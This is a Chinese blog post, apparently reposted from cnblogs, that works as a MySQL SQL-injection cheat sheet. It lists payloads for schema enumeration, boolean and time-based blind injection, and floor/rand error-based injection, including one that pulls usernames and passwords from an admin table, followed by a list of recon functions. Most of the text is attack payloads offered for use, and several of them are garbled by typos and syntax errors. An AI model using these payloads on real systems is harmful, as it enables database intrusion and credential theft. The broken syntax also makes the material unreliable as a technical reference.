zoukankan      html  css  js  c++  java

  • 注入复习总结

    /*不定期更新*/

    Mysql Code:

    #常规注入:
select schema_name from information_schema.schemata;
select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;
select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374;
#盲注:
select and ascii(mid(databases(),1,1))=115;
select and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1));
select and ascii(substring((select columns_name from information_schema.columns where column_schena=database() limit 1,1),1,1));
#延时盲注:
select and if(ascii(substring(database(),1,)),sleep(10),1);
select and if(ascii(substring((select table_name from information_schema.tables where table_schema=0x73716C696E6A656374),sleep(10),1));
select and if(ascii(substring((select columns_name from information_schema.columns where column_schema=0x73716C696E6A656374)),1,1),sleep(10),1);
#floor报错注入
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    信息收集函数:

    user()                             #当前使用者的用户名
database()                         #当前数据库名
version()                          #数据库版本
datadir                            #读取数据库的绝对路径
@@vasedir                          #Mysql安装路径
@@version_compile_os               #操作系统
concat()                           #连接一个或者多个字符串
group_concat()                     #连接一个组的所有字符串,并以逗号分隔每一条数据

    报错常用的函数:

    count  #计算元组的个数
rand    #取随机数
floor    #想下取正,比如1.9就取1

     结束
  • 相关阅读:
    又玩起了“数独”
    WebService应用:音乐站图片上传
    大家都来DIY自己的Blog啦
    CSS导圆角,不过这个代码没有怎么看懂,与一般的HTML是不同
    网站PR值
    CommunityServer2.0何去何从?
    网络最经典命令行
    炎热八月,小心"落雪"
    Topology activation failed. Each partition must have at least one index component from the previous topology in the new topology, in the same host.
    SharePoint 2013服务器场设计的一些链接
  • 原文地址:https://www.cnblogs.com/xishaonian/p/6200818.html
Copyright © 2011-2022 走看看